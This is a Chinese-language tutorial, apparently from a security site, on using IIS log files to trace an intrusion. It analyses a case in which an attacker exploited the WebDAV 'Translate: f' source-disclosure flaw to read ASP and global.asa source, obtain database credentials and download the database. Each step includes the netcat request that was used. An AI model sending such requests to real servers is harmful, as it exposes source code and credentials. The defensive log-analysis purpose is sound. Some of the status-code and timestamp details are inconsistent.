网站WebSite服务器对于网络成员信息共享提供了大大方便同时也带来了很多安全隐患妥善使用和管理网络资源成为了网络管理员面临严峻考验面对网络入侵者使用各种以知漏洞对网站WebSite服务器进行攻击分析和防范网络入侵者行为则成为解决网络安全问题个重要手段微软服务器系统Microsoft Internet Information Server (IIS)提供了套相当有效安全管理机制并且也提供了套强大日志文件系统学会读懂并分析这些日志对我们了解入侵者行为是致关重要下面我们就通过分析些详细入侵案例来介绍如何通过监视日志文件来发现入侵者行踪

注:出于众所周知原因本文中所有IP地址及域名等信息都经过修改

常见HTTP状态码含义:
"200" : 完成
"202" : 接受
"300" : 多重选择
"302" : 发现
"400" : 请求
"404" : 未发现
"502" : CGI

例子:通过原代码暴露漏洞得取数据库
笑傲江湖是近几年在国内兴起种使用asp脚本语言制作网络游戏很多网站WebSite为了增加访问量都放置了这个游戏来吸引访问者可以ASP脚本存在漏洞居多而很多网管都没有对自己服务器及时打补丁导致攻击者可以轻易得到原代码并且访问存放用户信息数据库

日志显示:
2001-06-23 03:00:12 10.1.1.1 - 10.1.1.1 80 GET /xajh/index.asp\ - 200 –
2001-06-23 03:00:12 10.1.1.1 - 10.1.1.1 80 GET /xajh/login.asp\ - 200 –
2001-06-23 03:00:12 10.1.1.1 - 10.1.1.1 80 GET /xajh/conn.asp\ - 400 –
2001-06-23 03:23:20 10.1.1.1 - 10.1.1.1 80 GET /xajh/global.asa\ - 200 –
2001-06-23 03:23:20 10.1.1.1 - 10.1.1.1 80 GET /xajh/xajhdb/xajh.mdb - 200 –

背景知识:
在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里WebDAV存在着个安全问题Translate:f当某人往目标机器ASP/ASA(或者其它脚本文件)发送包含有"Translate:f"文件头HTTP GET请求时windows2000(没有打过SP1补丁——现在打补丁还不是很多吧:)会返回该ASP/ASA源代码而不是本该返回经过处理文件(还需要在url结尾加上个特殊"/")虽然这个漏洞出现于windows2000但由于有些站点虽然仅使用IIS 4.0但却安装了FrontPage Server Extensions 2000所以这影响可能会扩展到IIS 4.0机器上

分析:
2001-06-23 03:00:12 10.1.1.1 - 10.1.1.1 80 GET /xajh/index.asp\ - 200 –
介绍说明:攻击者发现了漏洞并开始获取以知页面原代码
攻击思路方法:
[root@localhost /root]# nc -n 10.1.1.1 80
GET /index.asp\ HTTP/1.1 Translate: f

2001-06-23 03:00:19 10.1.1.1 - 10.1.1.1 80 GET /xajh/login.asp\ - 200 –
介绍说明:入侵者开始尝试得到些关键原代码例如这个登陆般这种脚本都会直接在这种登陆里连接些包含敏感信息数据库或其它连接
攻击思路方法:
[root@localhost /root]# nc -n 10.1.1.1 80
GET /login.asp\ HTTP/1.1 Translate: f

2001-06-23 03:00:58 10.1.1.1 - 10.1.1.1 80 GET /xajh/conn.asp\ - 400 –
介绍说明:看来入侵者没有在刚才登陆中得到他想要我们可以看看这个login原代码:

编很谨慎没有连接任何敏感文件或页面我们这位朋友看来有点头疼了所以他开始瞎猜页面可以看出这回他请求了conn.asp这个页面值得提醒是般数据库连接文件都是这个名字可惜是这个笑傲江湖不是我们可以看到返回状态码是400也就是没有找到页面
攻击思路方法:
[root@localhost /root]# nc -n 10.1.1.1 80
GET /conn.asp\ HTTP/1.1 Translate: f

2001-06-23 03:01:13 10.1.1.1 - 10.1.1.1 80 GET /xajh/logs.asp\ - 200 –
从日志上时间来看这回攻击和上回相差了很长时间估计这位朋友自己也没办法所以去请教朋友或者去自己下载了这套笑傲江湖原代码然后回来了以后击命中找到了这个重要连接:global.asa这个是用来指定事件脚本而在这个这个游戏中编写者使用它来声明Application和Session而且存放数据库地址和密码等我们来看看这个部分代码里面有很多东西我们选了最重要这段:
'Application("dbs")="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\xajhdb\xajh.mdb"
'Application("dbs")="driver={SQL Server};server=127.0.0.1;uid=xajh;pwd=xajh;database=xajh"
看来这个用了两个数据库个是MDB在\xajhdb\xajh.mdb另个则是SQL数据库是本地地址用户名和密码都是xajh
攻击思路方法:
[root@localhost /root]# nc -n 10.1.1.1 80
GET /global.asa\ HTTP/1.1 Translate: f

2001-06-23 03:23:20 10.1.1.1 - 10.1.1.1 80 GET /xajh/xajhdb/xajh.mdb - 200 –
介绍说明:找到了数据库地址当然是赶紧下载回来了另外我们后来来发现这个入侵者通过登陆SQL数据库在我们服务器执行了些命令
攻击思路方法:
[root@localhost /root]# nc -n 10.1.1.1 80
GET /xajh/xajhdb/xajh.mdb HTTP/1.1

上篇文章: 如何DoS攻击微软PPTP详细资料

下篇文章: 次渗透测试过程